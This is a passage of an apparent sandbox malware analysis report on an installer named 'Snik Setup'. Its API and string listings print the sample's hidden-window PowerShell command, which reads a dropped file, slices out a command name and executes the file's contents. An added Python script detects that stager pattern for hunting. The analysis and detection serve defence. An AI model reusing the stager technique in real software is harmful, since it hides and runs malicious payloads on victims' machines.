• SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
• SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
• SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
• ShowWindow.USER32(?,00000000), ref: 00404E93
• GetDlgItem.USER32(?,000003FE), ref: 00404E9E
• ShowWindow.USER32(00000000), ref: 00404EA5
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018

• Opcode ID: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
• Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
• Opcode Fuzzy Hash: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
• Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004043A1
• SetWindowTextA.USER32(00000000,?), ref: 004043CB
• SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
• CoTaskMemFree.OLE32(00000000), ref: 00404487
• lstrcmpiA.KERNEL32(: Completed,Snik Setup: Completed), ref: 004044B9
• lstrcatA.KERNEL32(?,: Completed), ref: 004044C5
• SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
  • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
  • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
  • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
  • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
  • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
• GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
  • Part of subcall function 00404709: lstrlenA.KERNEL32(Snik Setup: Completed,Snik Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
  • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
  • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Snik Setup: Completed), ref: 004047C2
Strings
• : Completed, xrefs: 004044B3, 004044B8, 004044C3
• powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 0040436B
• Snik Setup: Completed, xrefs: 0040444F, 004044B2
• A, xrefs: 00404475
• C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 004044A2
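The PowerShell command line in the Strings list above is the hand-off from the installer stub to the next stage: the whole dropped file is read with Get-Content -raw, a three-character slice is cut out of it at a fixed offset, and that slice is run with the call operator (".") with the blob itself as the argument. Nothing in the command names a cmdlet, so keyword matches on Invoke-Expression or IEX miss it; the string to hunt for is the shape of the command. The script below is an added example written for this report, not code from Joe Sandbox or from the sample. It parses that shape out of a captured command line, and shows how the SubString slice resolves against a blob. The blob is constructed: the report does not show which three characters sit at offset 72097 in Martyrization.Pra121, so the example places "IEX" at a small offset and labels that as an assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Added example (not from the Joe Sandbox report or the sample). Detects the
# "read blob, slice a cmdlet name out of it, call it on the blob" stager shape.

STAGER_RE = re.compile(
    r"""Get-Content\s+-raw\s+'(?P<path>[^']+)'                 # blob holding stage 2
        .*?\.SubString\((?P<offset>\d+),\s*(?P<length>\d+)\)   # where the cmdlet name sits
        .*?\.\$(?P<cmdvar>\w+)\(\$(?P<datavar>\w+)\)           # .$cmd($blob) call operator
    """,
    re.IGNORECASE | re.DOTALL | re.VERBOSE,
)


@dataclass
class Stager:
    path: str       # file read with Get-Content -raw
    offset: int     # SubString start
    length: int     # SubString length
    cmd_var: str    # variable invoked with the call operator '.'
    data_var: str   # variable passed to it (the whole blob)


def parse_stager(cmdline: str) -> Optional[Stager]:
    """Return the stager parameters if cmdline has the pattern, else None."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        return None
    return Stager(
        path=m.group("path"),
        offset=int(m.group("offset")),
        length=int(m.group("length")),
        cmd_var=m.group("cmdvar"),
        data_var=m.group("datavar"),
    )


def resolve_invoked_command(blob: str, offset: int, length: int) -> str:
    """Return the characters the stager would execute as a command name.

    Mirrors $blob.SubString(offset, length): PowerShell throws when the range
    runs past the end of the string, so raise instead of returning ''.
    """
    if offset < 0 or length < 0 or offset + length > len(blob):
        raise ValueError("SubString range outside the blob")
    return blob[offset:offset + length]


def triage(cmdlines: List[str]) -> List[Stager]:
    """Filter captured process command lines down to stager hits."""
    return [s for s in (parse_stager(c) for c in cmdlines) if s is not None]


# The command line recorded in the report's Strings list (xref 0040436B).
SAMPLE_CMDLINE = (
    'powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw '
    r"'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';"
    "$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);"
    ".$Sikkerhedsforvaringernes($Polysaccum)"
)

# Constructed stand-in for the dropped file. ASSUMPTION: the real slice at
# offset 72097 is a cmdlet alias such as IEX; the report does not show it.
CONSTRUCTED_BLOB = "x" * 40 + "IEX" + ";$payload = 'stage two goes here'"


if __name__ == "__main__":
    for hit in triage([SAMPLE_CMDLINE, "powershell.exe -Command Get-Process"]):
        print(f"stager reads {hit.path} and runs "
              f"${hit.data_var}.SubString({hit.offset},{hit.length}) as a command")
    print("constructed blob resolves to:", resolve_invoked_command(CONSTRUCTED_BLOB, 40, 3))
```

For a hunting query, the three anchors the regex relies on (Get-Content -raw, .SubString(N,M) with a small M, and `.$var($var)`) transfer directly to process-creation telemetry; the offset, variable names and file name vary per build and are not worth matching on.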
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$Snik Setup: Completed$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                          • API String ID: 2624150263-2929229892
                                                                                                                                                                                                          • Opcode ID: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                                                                                                                          • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                                                                                                                          • Opcode Fuzzy Hash: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                                                                                                                                          • "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 004055D1
                                                                                                                                                                                                          • \*.*, xrefs: 0040563C
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                          • API String ID: 2035342205-545839243
                                                                                                                                                                                                          • Opcode ID: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                                                                                                                                                          • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 0040211D
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen
                                                                                                                                                                                                          • API String ID: 123533781-468232566
                                                                                                                                                                                                          • Opcode ID: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                                                                                                                                                          • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                          • Opcode ID: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                                                                                                                                                          • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                                                                                                          • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
• Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
• Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
• Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
APIs
• CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
• GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
• GetSysColor.USER32(?), ref: 0040412B
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
• lstrlenA.KERNEL32(?), ref: 0040414C
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
• GetDlgItem.USER32(?,0000040A), ref: 004041D2
• SendMessageA.USER32(00000000), ref: 004041D5
• GetDlgItem.USER32(?,000003E8), ref: 00404200
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
• LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
• SetCursor.USER32(00000000), ref: 00404258
• ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
• LoadCursorA.USER32(00000000,00007F00), ref: 00404278
• SetCursor.USER32(00000000), ref: 0040427B
• SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
• SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: (@@$: Completed$N$open
• API String ID: 3615053054-1189687483
• Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
• Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
• Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
• Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,Snik Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$Snik Setup
• API String ID: 941294808-923494343
• Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
• Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
APIs
• lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
• GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
  • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
  • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
• GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
• wsprintfA.USER32 ref: 00405AEF
• GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
• SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
• GlobalFree.KERNEL32(00000000), ref: 00405BD8
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
  • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004059A6
  • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                          • API String ID: 222337774-4148678300
                                                                                                                                                                                                          • Opcode ID: 396ac98f4d2996a0896bc91c9097d8f7cdfcc781c751df2836a7ceba7e79aa7c
                                                                                                                                                                                                          • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 396ac98f4d2996a0896bc91c9097d8f7cdfcc781c751df2836a7ceba7e79aa7c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
APIs
• CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
• GetLastError.KERNEL32 ref: 00405465
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
• GetLastError.KERNEL32 ref: 00405484
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
• API String ID: 3449924974-2230009264
• Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
• Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
• Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
• Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
• CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
• CharNextA.USER32(?,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
• CharPrevA.USER32(?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
• *?|<>/":, xrefs: 00405FE2
• "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 00405FD6
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-177130630
• Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
• Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
• Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
• Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00403F98
• GetSysColor.USER32(00000000), ref: 00403FB4
• SetTextColor.GDI32(?,00000000), ref: 00403FC0
• SetBkMode.GDI32(?,?), ref: 00403FCC
• GetSysColor.USER32(?), ref: 00403FDF
• SetBkColor.GDI32(?,?), ref: 00403FEF
